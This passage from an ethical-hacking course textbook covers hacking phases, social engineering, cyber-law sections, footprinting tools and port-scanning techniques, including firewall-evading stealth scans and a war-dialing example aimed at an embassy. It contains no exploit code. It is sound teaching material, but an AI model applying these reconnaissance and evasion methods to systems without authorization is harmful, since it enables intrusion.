internal or external without authorization.
Passive Reconnaissance monitoring network data for patterns and clues. This
includes sniffing attacks and information gathering tools.
Active Reconnaissance involves probing the network to detect
" Accessible host
" Open ports
" Locations of routers
" Details of operating systems and services
Second step involved in getting information is Scanning. Scanning refers to as
pre-attack phase when the hacker scans the network with specific information
gathered from reconnaissance. An attempt by hackers to find the weaknesses of
a computer or network by scanning or probing system ports via requests for
information. It can be used maliciously to detect and exploit weaknesses.
Scanning can include use of dialers, port scanners, network mapping, sweeping,
vulnerability scanners etc.
Figure 2.1
#
#
#
Next steps are Gaining Access and this refers to the true attack phase. The
hacker exploits the system. The exploit can occur over a LAN, locally, Internet,
offline, as a deception or theft. Examples include stack based buffer overflows,
denial of service, session, hijacking, password filtering etc.
Maintaining access is the next phase and this refers to the phase when the
hacker tries to retain his ‘ownership’ of the system. The hacker has exploited
vulnerability and can tamper and compromise the system. Hackers can upload,
download or manipulate data / applications / configurations on the ‘owned’
system.
Exit from the target, when the attacker tries to cover his tracks by changing the
names of the files installed by him or by transferring them to such parts in the
directory structure where they cannot be easily detected. The attacker may also
try to manipulate the log files and control programs of the system in such a way
that his attack could not be noticed.
_______________________________________________________________________________________
2.5 What do the Ethical Hackers do?_______________
Ethical hackers also do the same job like Crackers, but only one major difference
is their Attitude. Ethical Hackers are always trusting in nature and having positive
Attitude. They Works for security and try to stop/ Prevent Cyber Crime.
The job of the Ethical Hackers are:
# They try to scan the system / Network / Website like Crackers so that they
can secure it in the better way.
# They try to gain the Access of the system / Network / Website so that
they’ll be able to block the vulnerabilities up to certain extend.
# They do Penetration Testing and search in depth of loop holes on the
ports / services of Web Servers / Networks / Operating Systems or the
applications which are used in the business units.
2.3, 2.4, 2.5 Check your Progress
Fill in the blanks
1) Cyber security involves protecting that information by preventing, __________, and __________ to
different attacks.
2) __________ are the people who indulge in cyber crimes and frauds and use their knowledge for
offensive purposes.
3) Individuals professing hacking skills and using them for defensive purposes along with the ethics are
known as __________ or Security Analyst.
4) Individuals who work both offensively and defensively at various times as per their benefits are known
as __________.
2.6 Types Of Attacks_____________________________
2.6.1 Non-Technical Attacks
Non-technical attack is the human element of hacking. The term "there is nothing new
under the Sun" is extremely relevant when you talk about hacking. In most cases, a
hacker will use a computer to gather information but, utilizing psychology to gain access
to systems and services has been around a lot longer than computers. Utilizing nontechnical attacks, hardware and software together can be a very effective information
gathering tool (whether it is legal or not!).
Non-technical methodology can be split up into the following areas:
2.6.1.1 Bribery
_______________________________________________________________________________________
This is the easiest way to gain information. Bribery can be as direct as cash payments
or something more subtle. Bribery can lead to blackmail in order to maintain access to
the source of information.
2.6.1.2 Social Engineering
It is the collection of the Information from the Social Network which may be used
technically for making a crime. For e.g. It could be as simple as someone phoning an
employee, pretending to be a member of the computer support team and asking for their
User ID and password. Individuals have been known to seek employment within an
organization with the sole aim of gathering information to attack the employing company
or pass secrets to a competitor.
2.6.1.3 Shoulder Surfing
Shoulder Surfing involves the collection of information by eavesdropping. It usually
doesn’t involve much technology although it has been known for hackers to use video
cameras, binoculars and audio bugs to gain information.
_______________________________________________________________________________________
2.6.2 Technical attacks
2.6.2.1 Network Attacks
Network attacks are easier to attempt, because many networks can easily be reached or
hacked from any part of the world via Internet. Few examples of network-infrastructure
attacks are as follows:
#
#
#
#
#
Connecting into a network through a rogue modem attached to a computer
behind a firewall.
Exploiting weaknesses in network transport mechanisms, such as TCP/IP and
NetBIOS.
Flooding a network with too many requests, creating a denial of service (DoS) for
legitimate requests.
Installing a network analyzer on a network and capturing every packet that travels
across it, revealing confidential information in clear text.
Piggybacking onto a network through an insecure 802.11b wireless configuration.
2.6.2.2 Operating System Attacks
Operating System (OS) Attacks are the second most frequent attacks which are
followed by the Crackers. Hacking of operating systems is a preferred method of the
crackers which comprises a large portion of hacker attacks simply, because every
computer has one and so many well-known exploits that can be used against them. But
hackers prefer to attack operating systems like Windows and Linux because they are
widely used and better known for their vulnerabilities.
Here are some examples of attacks on operating systems:
#
#
#
#
Exploiting specific protocol implementations.
Attacking built-in authentication systems.
Breaking file-system security.
Cracking passwords and encryption mechanisms.
2.6.2.3 Application Attacks
The attacks that are performed to capture the Business, Financial or Confidential
information in the form of various Applications followed by the industrial architechture
like OS based applications, Network based Applications, Web based Applications, or
even Web based services as well which includes E-Commerce also, takes a lot of hits
by crackers. Programs such as e-mail server software and Web applications often are
mentioned below:
#
Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol (SMTP)
applications are frequently attacked because most firewalls and other security
mechanisms are configured to allow full access to these programs from the
Internet.
_______________________________________________________________________________________
#
Malicious software (malware) includes viruses, worms, Trojan horses, and
spyware. Malware clogs networks and takes down systems.
2.7 CYBER LAW_________________________________
India has inacted the first I.T. Act 2000 based on UNCIRAL model recommended by
the general assembly of the United Nations. These act deals with offense/ crime
along with certain other provisions scattered in these acts. The various offences are
mentioned as below:
Offence Section under I.T. Act 2000
#
#
#
#
#
#
!
Tampering with Computer source documents Sec.65
Hacking with Computer systems, Data alteration Sec.66
Publishing obscene information Sec.67
Un-authorized access to protected system Sec.70
Breach of Confidentiality and Privacy Sec.72
Publishing false digital signature certificates Sec.73
NOTE: Sec.78 of I.T. Act empowers Deputy Supt. of Police to investigate cases
falling under this Act. 1.5.2 Computer Related Crimes Covered under IPC and
Special Laws
Offence Section
#
#
#
#
#
#
#
#
#
Sending threatening messages by email
Sending defamatory messages by email
Forgery of electronic records
Bogus websites, cyber frauds
Email spoofing
Web-Jacking
E-Mail Abuse
Online sale of Drugs
Online sale of Arm
Sec 503 IPC
Sec 499 IPC
Sec 463 IPC
Sec 420 IPC
Sec 463 IPC
Sec. 383 IPC
Sec.500 IPC
NDPS Act
Arms Act
2.11 What is Social Engineering?______
Social Engineering is hacker-speak for tricking a person into revealing their password. A
classic social engineering trick is for a hacker to send email claiming to be a system
administrator. The hacker will claim to need your password for some important system
administration work, and ask you to email it to him/her. As we explain later, it's possible
for a hacker to forge email, making it look like it came from somebody you know to be a
legitimate system administrator. Often the hacker will send this message to every user
_______________________________________________________________________________________
on a system, hoping that one or two users will fall for the trick. A common variation is to
do this by phone, talk or IRC.
An employee may unwittingly give away key information in an email or by answering
questions over the phone with someone they don't know or even by talking about a
project with co-workers at a local pub after hours. Companies with authentication
processes, firewalls, virtual private networks and network monitoring software are still
wide open to attacks.
2.12 Art of Manipulation__________________________
Social Engineering is the acquisition of sensitive information or inappropriate
access privileges by an outsider, based upon building of inappropriate trust
relationships with outsiders.
The goal of a social engineer is to trick someone into providing valuable
information or access to that information.
It preys on qualities of human nature, such as the desire to be helpful, the
tendency to trust people and the fear of getting in trouble.
2.13 Human Weakness___________________________
People are usually the weakest link in the security chain.
A successful defense depends on having good policies in place and educating
employees to follow the policies.
Social Engineering is the hardest form of attack to defend against because it
cannot be defended with hardware or software alone.
2.14 Common Types of Social Engineering__________
Social Engineering can be broken into two types i.e. human based and computer based
Human-based Social Engineering refers to person to person interaction to
retrieve the desired information.
Computer based Social Engineering refers to having computer software that
attempts to retrieve the desired information.
2.15 Human based – Impersonation________________
Human based social engineering techniques can be broadly categorized into:
Impersonation
Posing as Important User
Third-person Approach
Technical Support
In Person
_______________________________________________________________________________________
" Dumpster Diving
" Shoulder Surfing
2.16 Dumpster Diving____________________________
Dumpster diving is the colloquial name for going through somebody's rubbish - which
will usually be found in dumpsters (rubbish skips) for large organizations or bins for the
general public.
In the corporate environment this could be used in the first stage of an intrusion. The
hacker can map out the victim, understand the way the organization works and, in some
cases, could find out passwords and account names (written on post-notes! - does this
sound familiar?). They could even find out enough specific information (such as takeover bid or proprietary application information) to make further attacks unnecessary.
2.17 Shoulder Surfing____________________________
Shoulder Surfing involves the collecting of information by eavesdropping. It usually
doesn’t involve much technology although it has been known for hackers to use video
cameras, binoculars and audio bugs to gain information.
You can quite often find shoulder surfers in busy places such as airports. Simply
listening to two people having a conversation can give valuable information about those
individuals and their organization. Lip-reading provides the additional benefits of only
having to be in line of site and not within audible range. Watching keystrokes can
provide you with password details and reading someone’s screen can give you valuable
information. Next time you're in a departure lounge, take a look at the number of people
who are using Laptops. Are they working securely?
2.18 Computer Based Social Engineering___________
These can be divided into the following broad categories:
• Mail / IM attachments
• Pop-up Windows
• Websites / Sweepstakes
• Spam Mail
_______________________________________________________________________________________
Figure 2.2
2.19 Reverse Social Engineering___________________
#
#
#
More advanced method of gaining illicit information is known as "reverse social
engineering"
This is when the hacker creates a persona that appears to be in a position of
authority so that employees will ask him for information, rather than the other way
around.
The three parts of reverse social engineering attacks are sabotage, advertising
and assisting.
2.20 Policies and Procedures______________________
#
#
#
#
Policy is the most critical component to any information security program.
Good policies and procedures are not effective if they are not taught and
reinforced to the employees.
They need to be taught to emphasize their importance.
After receiving training, the employee should sign a statement acknowledging
that they understand the policies.
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Chapter-3
Information Gathering
Session Objectives:
Steps for Gathering Information
Some Utilities And Techniques Are:
Unearthing Initial Information
ARIN
TCP 3-Way Handshake
Port Scanning
Objectives of Scanning:
Proxy Servers
Anonymizers
_______________________________________________________________________________________
Introduction____________________________________
Foot-printing
Foot Printing is the first and most convenient way that hackers use to gather information
about computer systems and the companies they belong to. The purpose of Foot
Printing is to learn as much as you can about a system, its remote access capabilities,
its ports and services, and the aspects of its security. In order to perform a successful
hack on a system, it is best to know as much as you can, if not everything, about that
system.
3.1 Steps for gathering information_________________
Information gathering is a technique by which we can get the more details about the
target system the steps are as follows:
Step 1: Always set your target before starting your activity
Step 2: Ones the target is defined then we have to think how we can approach them.
Example as if I want to reach my friends home then I must have address of the
destination, or if not then I use to concept of social Engineering (i.e. collect the
information by my nears and dears, some other friends or any how…, it means that I
have to think the best possible way to get the address of the destination either by any
technique) In case of computers we have an I.P address so if you want to hack say
http://www.anupgirdhar.net then you must have an IP address or DNS to approach to
this site.
3.2 Some Utilities and Techniques are:______________
Ping Command
# Email Bouncing Techniques
# Netstat
# Whois
Step 3: Once we get the IP address then we have to search the location for the target.
To find out the Geographical Location of the IP Address there are certain methods are
there i.e.
Some Utilities and Techniques are:
#
#
Neo Trace Pro
http://visualroute.visualware.com
Step 4: Once you get the IP Address or DNS then we have to search the way to enter
website or any destination.
_______________________________________________________________________________________
Example: Now I got the address and location of my friend but how can I enter in that
area say by door, if it is closed then I have to search the other way lets take it a window,
if it also closed then by roof, if it is not possible then I break a wall, or dug a hole etc. but
want to enter in that area at any cost, so In the same way computers are also having
ports by which any data can enter. Now there are two types of ports:
#
#
Physical ports
Virtual Ports
Physical Ports like:
Serial Ports: COM1, COM2
Parallel Ports: LPT1, LPT2
USB ports etc.
These ports are used to connect different hardware devices like mouse, Modem, Printer,
Scanners, Web CAM External Memories etc.
Virtual Ports:
The virtual ports are generally used to make the connectivity between no of computers
or the request which comes from the networks. As we Install any software which based
on client server architecture generally system have their own virtual port which used to
establish the connectivity and able to accept the request from others, A concept of
multiple request handling on the networks.
Some software’s like:
RDBMS packages (Oracle, SQL Server Etc.)
Network Software (Proxy servers, or protocols like
PROTOCOLS
PORTS
HTTP
80
FTP
21
TELNET
23
SMTP
25
So we have to scan the ports on the target IP Address to check that ports which are
open so that we try to enter through these ports.
_______________________________________________________________________________________
3.3 The Software and Utilities are__________________
#
#
#
Nmap
Port Scan
Shadow Scan etc.
3.4 Unearthing Initial Information__________________
Commonly includes:
#
#
#
Domain name lookup
Locations
Contacts (Telephone /mail)
Information Sources:
#
#
#
Open source
Whois
Nslookup
3.5 What Is WHOIS?_____________________________
#
#
#
#
#
A directory service
Protocol and application
Client/Server based
InterNIC and DDN (Defense Data Network) directories
Other WHOIS directories
3.5.1 WHOIS actually refers to three things:
1. Searchable directories, maintained by the InterNIC and the Defense Data
Network's Network Information Center (DDN NIC), which contain information
about networks, networking organizations, domains, sites, and the contacts
associated with them.
2. The protocol or set of rules, that describes the application used to access these
directories.
3. Any directory based on the WHOIS protocol.
The information found in the InterNIC and DDN NIC's WHOIS directories includes:
domain names and IP addresses, contact names, company names, postal and
electronic mail addresses, phone numbers, etc.
_______________________________________________________________________________________
3.5.2 WHOIS is used:
To find information about networks, domains, and hosts
To locate contact information (people) for networks and domains when
registering a domain name, to see if the name is already in use
WHOIS works on the client/server principle. A WHOIS client program enables the user's
computer to contact a WHOIS server, submit a search query, and receive a response to
that query.
#
#
3.5.3 WHOIS can be accessed in a number of ways:
through a local WHOIS client,
an interactive telnet session,
E-mail or a Web-based form (at the InterNIC).
#
#
#
3.5.4 The WHOIS Command
The /usr/bin/whois command searches a user name directory and displays information
about the user ID or nickname specified in the Name parameter. The whois command
tries to reach ARPANET host internic.net where it examines a user-name database to
obtain information. The whois command should be used only by users on ARPANET.
Refer to RFC 812 for more complete information and recent changes to the whois
command.
3.5.5 Syntax
Whois [ -h Hostname] [ . | ! ] [*] Name [. . .]
The Name [. . .] parameter represents the user ID, host name, network address, or
nickname on which to perform a directory search. The whois command performs a
wildcard search for any name that matches the string preceding the optional ... (three
periods).
Flags
.
Forces a name-only search for the name specified in the Name parameter.
!
Displays help information for the nickname or handle ID specified in the
Name parameter.
*
Displays the entire membership list of a group or organization. If there are
many members, this can take some time.
?
Requests help from the ARPANET host.
_______________________________________________________________________________________
-h
Hostname specifies an alternative host name. The default host name on the
ARPANET is internic.net. You can contact the other major ARPANET username database, nic.ddn.mil, by specifying the -h Hostname flag.
3.5.6 WHOIS
Figure 3.1
3.6 Nslookup___________________________________
Nslookup is a program to query Internet domain name servers. It displays information
that can be used to diagnose Domain Name System (DNS) infrastructure. Helps find
additional IP addresses if authoritative DNS is known from whois. MX record reveals the
IP of the mail server. Both UNIX and Windows come with a Nslookup client. Third party
clients are also available – E.g. SamSpade
_______________________________________________________________________________________
3.7 Using Sam Spade____________________________
Figure 3.2
3.7.1 Basics Configuration
Enter the address you're interested in the address box. If you've copied an address to
the clipboard you can use the paste button or menu option to paste it into the address
box.
Then you can do all sorts of things to that address using the toolbar
The results will appear in a new window. Some parts of the results may be highlighted
as active text. On Right-clicking the active text will popup a menu of things you can do
next. Left clicking on it will do the most common operation.
If you're chasing down information about the owner of an address it's handy to be able
to save the useful intermediate results. The two buttons on the left of the toolbar let you
copy results to the Log Window for later use
_______________________________________________________________________________________
3.7.2 Header analysis
If you have a suspicious looking set of email headers you can copy them to the
clipboard from your mail reader and paste them into Sam Spade. They'll appear in a
new window, with any addresses highlighted as active text. If you have Smart Paste
enabled Sam Spade will run a rudimentary header analysis. It's not perfect, but can
sometimes find suspicious parts of the header
Header analysis is only useful if you paste a full set of headers. See here for ways to
turn on full headers on common mail programs
3.7.3 More advanced tools
There are some more sophisticated tools available on the Tools menu. Some of these
may need to be enabled before you can use them.
Locate the Network Range
Commonly includes:
#
#
Finding the range of IP addresses
Discerning the subnet mask
Information Sources:
#
#
ARIN (American Registry of Internet Numbers)
Traceroute
Hacking Tool:
#
#
NeoTrace
Visual Route
3.8 ARIN_______________________________________
ARIN allows search on the whois database to locate information on networks
autonomous system numbers (ASNs), network-related handles and other related point
of contact (POC).
ARIN whois allows querying the IP address to help find information on the strategy used
for subnet addressing.
_______________________________________________________________________________________
Figure 3.3 Screenshot: ARIN WHOIS Output
Figure 3.4
_______________________________________________________________________________________
3.9 Traceroute__________________________________
Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time to
Live. Traceroute reveals the path IP packets travel between two systems by sending out
consecutive UDP packets with ever-increasing TTLs. As each router processes a IP
packet, it decrements the TTL. When the TTL reaches zero, it sends back a "TTL
exceeded" message (using ICMP) to the originator. Routers with DNS entries reveal the
name of routers, network affiliation and geographic location.
3.10 NeoTrace Pro_______________________________
NeoTrace pro delivers a powerful tool for checking information on Internet sites. You
can trace any computer on the internet simply by entering an email, IP address or URL.
The display shows you the route between you and the remote site including all
intermediate nodes and their registrant information.
Figure 3.5
_______________________________________________________________________________________
3.11 Tool: VisualRoute Trace______________________
Figure 3.6
3.11.1 Running VisualRoute
Windows: Go to Start / Programs / VisualRoute and click on VisualRoute. If you are
running under NT/Win2000, it is possible to configure VisualRoute to run as a Service.
UNIX: To run VisualRoute for UNIX follow these steps. It is possible to configure
VisualRoute to run as a daemon service that is started at system boot. Refer to
Appendix A for details.
#
#
Change to the install directory "cd vr7"
Make sure that the current directory ('.') is in the PATH environment variable by
typing "env | grep PATH". There may be perhaps two or more environment
variables that have PATH in them. If it's not already there then set it with
(assuming a Kourne shell) "PATH=$PATH:.; export PATH".
_______________________________________________________________________________________
Note: You could also amend the profile of the account that will be running
VisualRoute to include ('.')
!
#
If using a Java 1.1 Runtime Environment (JRE), type "jre vr" to run VisualRoute.
Otherwise, type "java vr"
Mac: VisualRoute is installed in the /Applications/VisualRoute folder. Click on the
VisualRoute application in this directory to start VisualRoute.
3.12 Tool: SmartWhois___________________________
Figure 3.7
_______________________________________________________________________________________
Features:
Smart operation: The program always looks up whois data in the right database;
you don't have to waste your time trying them all.
Integration with Microsoft Internet Explorer and Microsoft Outlook. Look up
domain owners and IP addresses in e-mail headers instantly!
Saving results into an archive: you can build your own database that can be
viewed offline.
Batch processing of IP addresses or domain lists.
Caching of obtained results.
Hostname resolution and DNS caching.
Integration with CommView Network Monitor: Can be accessed from CommView
for quick, easy lookup.
Calling SmartWhois directly from your application. See SmartWhois FAQ.
Wildcard queries.
Whois console for custom queries.
Country code reference.
Customizable interface.
SOCKS5 firewall support.
3.13 Tool: CallerIP_______________________________
CallerIP Standard Edition allows real time monitoring of any machine that it is installed
on. This allows you to detect suspicious activity such as spyware and see where in the
world they are connecting from. Worldwide whois reports and network provider reports
are also available for any connection!
Advanced CallerIP Advanced Edition (inc. all Standard features) allows you to run it
as a server! This allows you to monitor the connections made to and from your
machines from a remote location! Automated Alerts are also available to you are notified
the moment something suspicious attempts a connection to your server(s).
_______________________________________________________________________________________
Figure 3.8
Plot all connections
This feature enables you to have CallerIP plot all the connections on the world
map. This in turn allows for easy and quick analysis of where connections made
to/from your machine reside.
New look table
The new look table includes gradient fills. This means the color of the row in the
table depends on the threat of the connection. If the connection being made to
your machine is harmless then the gradient will be green. Another quick an easy
way to identify the threat of a connection.
Condensed CallerIP
CallerIP now allows you to minimize it to a very small and detailed dialog box.
The small window gives you everything you need to know but stays in the
background.
Real-time monitoring instantly identifies suspect activity and spyware
CallerIP monitors all connections to and from your system and actively scans
ports for possible back doors that allow unauthorized access.
Identifies the country of origin for all connections
A connection to/from a high-risk country is a key indicator of suspect activity and
could likely be someone looking to steal your confidential information or
compromise your system. CallerIP shows you the country location of connections
so you can identify suspect activity and protect your information.
Network Provider reporting with abuse reporting information
See the contact and abuse reporting information for the company providing
internet access for an IP address or website, so you can easily report hackers or
Internet abuse.
_______________________________________________________________________________________
Worldwide Whois reports
Caller IP Pro queries worldwide databases to report the up-to-date registration
information for the 'owner' of an IP address or domain. Information includes
name, address, phone and email contact information.
Detailed log of connection history with search options
Each connection or attempted connection is automatically logged, with search
capabilities for quick lookups of past connection activity.
3.14 Tool: Mail Tracking (mailtracking.com)__________
What is MailTracking?
Mail Tracking is the most powerful and reliable email tracking service that exists
today. In short - MailTracking tells you when email you sent gets read / re-opened
/ forwarded and so much more.
How do I send a tracked email?
There are two ways you can send tracked emails:
1. Simply o (they won't see this)
or
2. Install our Active Tracker plug-in to add the tracking for you.
Testing? If you send tracked emails to yourself, your anti-spam filters may block them
(people don't usually write to themselves) - so we recommend you test by sending to
other people.
What will you tell me about the tracked emails I send?
MailTracking will endeavor to provide the following in your tracking reports:
"
"
"
"
"
"
"
"
"
"
Date and time opened
Location of recipient (per their ISP city /town)
Map of location (available on paid subscriptions)
Recipients IP address
Apparent email address of opening (if available)
Referrer details (i.e.; if accessed via web mail etc)
URL clicks
How long the email was read for
How many times your email was opened
If your email was forwarded, or opened on a different computer
All messages sent via Mail Tracking benefit from our SPF compliant and Sender-ID
compliant mail servers. This confirms safe transmission of your messages, and also
enables us to report delivery status to you (including: bounce-backs, delays and
success notifications). Delivery information is listed in your Personal Tracking Page.
_______________________________________________________________________________________
! Note: MailTracking.com does not use or contain any spyware, malware, nor virues, it
is not illegal to use, and does not breach any privacy regulations in any countries.
Figure 3.9
What else does Mail Tracking do?
There are lots of great features available to you - these include the following sending
options:
"
"
"
"
"
"
"
"
"
"
"
Certified email
Ensured-Receipts and retractable emails
Invisible tracking
Self-Destructing emails
Block printing
Block forwarding
Adobe Acrobat PDF Document Tracking
Secure Encrypted emails
Track MS Word or Excel documents
You can also choose how to receive your receipts:
In your Personal Tracking Page (when you log in)
_______________________________________________________________________________________
"
"
"
"
"
Email Read Notifications.
Legal Proof-of-Opening receipts
Delivery Service Notifications (DSN's)
SMS alert on your cell-phone or pager
Instant Messenger
These options are available to you from "My Account" in Member Utilities.
Getting started
Mail Tracking offers a lot of features and sending options, but it is very easy to use our
service. On start up, your account is already configured per our 'Recommended'
tracking defaults - and we will automatically send you email Read Notifications when
your tracked emails are opened.
3.15 Summary__________________________________
#
#
#
#
#
Information gathering phase can be categorized broadly into seven phases.
Footprinting renders a unique security profile of a target system.
Whois, ARIN can reveal public information of a domain that can be leveraged
further.
Traceroute and mail tracking can be used to target specific IP and later for IP
spoofing.
Nslookup can reveal specific users and zone transfers can compromise DNS
security.
Scanning___________________________
The art of detecting which systems are alive and reachable via the Internet, and what
services they offer, using techniques such as ping sweeps, port scans, and operating
system identification, is called scanning.
3.16 Objectives of Scanning:______________________
#
#
#
#
#
#
#
Detecting ‘live’ systems on target network.
Discovering services running/ listening on target systems.
Understanding port scanning techniques.
Identifying TCP and UDP services running on target network.
Discovering the operating system
Understanding active and passive fingerprinting.
Automated discovery tools.
3.17 Scanning is done to detect live system on the
target network to:
_______________________________________________________________________________________
To determine the perimeter of the target network /system
#
#
To facilitate network mapping
To build an inventory of accessible systems on target network
3.18 Tools used:
#
#
War Dialers
Ping Utilities
3.18.1 War Dialers
#
#
#
#
A war dialer is a tool used to scan a large pool of telephone numbers to detect
vulnerable modems to provide access to the system.
A demon dialer is a tool used to monitor a specific phone number and target its
modem to gain access to the system.
Threat is high in systems with poorly configured remote access products
providing entry to larger networks.
Tools include THC-Scan, ToneLoc, TBA etc.
Figure 3.10
_______________________________________________________________________________________
War Dialers
War dialing, also called scanning, is dialing a large number of telephone numbers in the
hope of finding anything interesting. Interesting items often include test tones,
computers, Voice Mail Boxes (VMB's), Private Branch Exchanges (PBX's), and
government offices.
A common technique is to find one telephone number owned by a target and then to war
dial the entire prefix which that number belongs to. For example, if your target is the
Chinese embassy in Washington, D.C., you would dial every number starting with
(202)328. That's ten thousand numbers.
War dialing one telephone number takes approximately 35 seconds. This means that
war dialing a prefix of ten thousand numbers will take just over four days.
War dialing can be done by hand, although dialing several thousand telephone numbers
by hand is extremely boring and takes a long time. A much better strategy is to use a
war dialing program, sometimes called a war dialer or a demon dialer.
3.18.1.1 Tool: THC Scan
Figure 3.11
3.18.2 Ping
#
#
#
#
#
Ping send out an ICMP Echo Request packet and awaits an ICMP Echo Reply
message from an active machine.
Alternatively, TCP/UDP packets are sent if incoming ICMP messages are
blocked.
Ping helps in assessing network traffic by time stamping each packet.
Ping can also be used for resolving host names.
Tools include Pinger, WS_Ping ProPack, NetScanTools, HPing, icmpenum
_______________________________________________________________________________________
3.18.2.1 Detecting Ping Sweeps
Ping sweeps form a basic step in network mapping by polling network blocks and/or IP
address ranges.
3.18.2.2 Ping Utilities include:
#
#
#
#
WS_PingProPack (www.ipswitch.com)
NetScan Tools (www.nwpsw.com)
Hping (http://www.hping.org/download.html)
icmpenum (www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz)
3.18.2.3 Ping Sweep Detection Utilities include:
#
#
#
#
Network based IDS (www.snort.org)
Genius (www.indiesoft.com)
BlackICE (www.networkice.com)
Scanlogd (www.openwall.com/scanlogd)
3.19 Hacking Tool: Pinger________________________
Pinger is one of the fastest ICMP sweep scanners. Its advantage lies in its ability to
send multiple ICMP ECHO packets concurrently and wait for the response.
It also allows you to resolve host names and save the output to a file. Blocking ICMP
sweeps is rather easy, simply by not allowing ICMP ECHO requests into your network
from the void.
If you are still not convinced that you should block ICMP ECHO requests, bear in mind
that you can also perform Broadcast ICMP's.
_______________________________________________________________________________________
Figure 3.12
3.20 Hacking Tool: WS_Ping_Pro__________________
WS_Ping ProPack is an integrated set of Internet diagnostic and information tools.
WS_Ping ProPack provides an easy-to-use graphical interface to the most commonly
used Internet tools, including Ping, Traceroute, DNS lookup, Finger, Whois, LDAP,
SNMP tools. This set of tools helps you quickly track down network problems and find
information about users, hosts, and networks on the Internet (or on an intranet). In
addition, WS_Ping ProPack lets you test web addresses, synchronize your local
computer with a time server, and test the throughput on a connection.
WS_Ping ProPack runs on Windows 98, 95, 2000, and Windows NT systems and can
query any device on a TCP/IP network, including PCs, UNIX systems, and routers.
_______________________________________________________________________________________
Figure 3.13
3.21 Port Scanning______________________________
A Port Scan is one of the most popular reconnaissance techniques attackers use to
discover services they can break into. All machines connected to a Local Area Network
(LAN) or Internet run many services that listen at well-known and not so well known
ports. A port scan helps the attacker find which ports are available (i.e., what service
might be listing to a port). Essentially, a port scan consists of sending a message to
each port, one at a time. The kind of response received indicates whether the port is
used and can therefore be probed further for weakness.
A Port scan is like ringing the doorbell to see whether someone's at home. The police
usually can't do anything about it. They have to wait until a crime is committed. The
police might give it more consideration if the doorbell is repeatedly rang causing the
homeowner to complain of harassment. Sometimes, if a computer system is affected
too much by a port scan, one can argue that the port scan was, in fact, a denial-ofservice (DoS) attack, which is usually an offense.
_______________________________________________________________________________________
3.22 TCP’s 3-Way Handshake_____________________
The TCP connection establishment process is called "the three way handshake", and is
combined of three segments.
1. A client sends a SYN segment specifying the port number of a server that the
client wants to connect to, and the client initial sequence number.
2. If the server's service (or port) is active the server will respond with its own SYN
segment containing the server's initial sequence number. The server will also
acknowledge the client's SYN by ACKing the client's SYN+ 1. If the port is not
active, the server will send a RESET segment, which will reset the connection.
3. The client will acknowledge the server's SYN by ACKing the servers ISN+ 1.
When will a RESET be sent? – Whenever an arriving segment does not appear
correct to the referenced connection. Referenced connection means the
connection specified by the destination IP address and port number, and the
source IP address and the port number.
Figure 3.14
3.22.1 Tcp Scan Types
The simplest port scan tries (i.e., sends a carefully constructed packet with a chosen
destination port number) each of the ports from 0 to 65535 on the victim to see which
ones are open.
3.22.2 TCP connect()
The connect() system call provided by an OS is used to open a connection to every
interesting port on the machine. If the port is listening, connect() will succeed, otherwise
the port isn't reachable.
_______________________________________________________________________________________
3.22.3 Strobe
A strobe does a narrower scan, only looking for those services the attacker knows how
to exploit. The name comes from one of the original TCP scanning programs, though
now virtually all scanning tools include this feature.
3.22.4 Stealth port scan
One problem, from the perspective of the attacker attempting to scan a port, is that
services listening on these ports log scans. They see an incoming connection, but no
data, so an error is logged. There exist a number of stealth scan techniques to avoid
this. A stealth scan is a kind of scan that is designed to go undetected by auditing tools.
Obviously, this is a race between the hacker and firewall vendors - what are considered
stealth scans now may not be so in a few months once the firewall vendor becomes
aware of such techniques.
3.22.5 Fragmented packet Port Scan
The scanner splits the TCP header into several IP fragments. This bypasses some
packet filter firewalls because they cannot see a complete TCP header that can match
their filter rules. Some packet filters and firewalls do queue all IP fragments, but many
networks cannot afford the performance loss caused by the queuing.
3.22.6 SYN scan
This technique is also called half-open scanning, because a TCP connection is not
completed. A SYN packet is sent (as if we are going to open a connection), and the
target host responds with a SYN+ACK, this indicates the port is listening, and an RST
indicates a non- listener. The server process is never informed by the TCP layer
because the connection did not complete.
3.22.7 FIN scan
The typical TCP scan attempts to open connections (at least part way). Another
technique sends erroneous packets at a port, expecting that open listening ports will
send back different error messages than closed ports. The scanner sends a FIN
packet, which should close a connection that is open. Closed ports reply to a FIN
packet with a RST. Open ports, on the other hand, ignore the packet in question. This is
required TCP behavior. If no service is listening at the target port, the operating system
will generate an error message. If a service is listening, the operating system will silently
drop the incoming packet. Therefore, silence indicates the presence of a service at the
port. However, since packets can be dropped accidentally on the wire or blocked by
firewalls, this isn't a very effective scan.
_______________________________________________________________________________________
Other techniques that have been used consist of XMAS scans where all flags in the
TCP packet are set, or NULL scans where none of the bits are set. However, different
operating systems respond differently to these scans, and it becomes important to
identify the OS and even its version and patch level.
3.22.8 UDP SCANNING_________________________________
Port scanning usually means scanning for TCP ports, which are connection-oriented
and therefore give good feedback to the attacker. UDP responds in a different manner.
In order to find UDP ports, the attacker generally sends empty UDP datagrams. If the
port is listening, the service should send back an error message or ignore the incoming
datagram. If the port is closed, then most operating systems send back an "ICMP Port
Unreachable" message. Thus, you can find out if a port is NOT open, and by exclusion
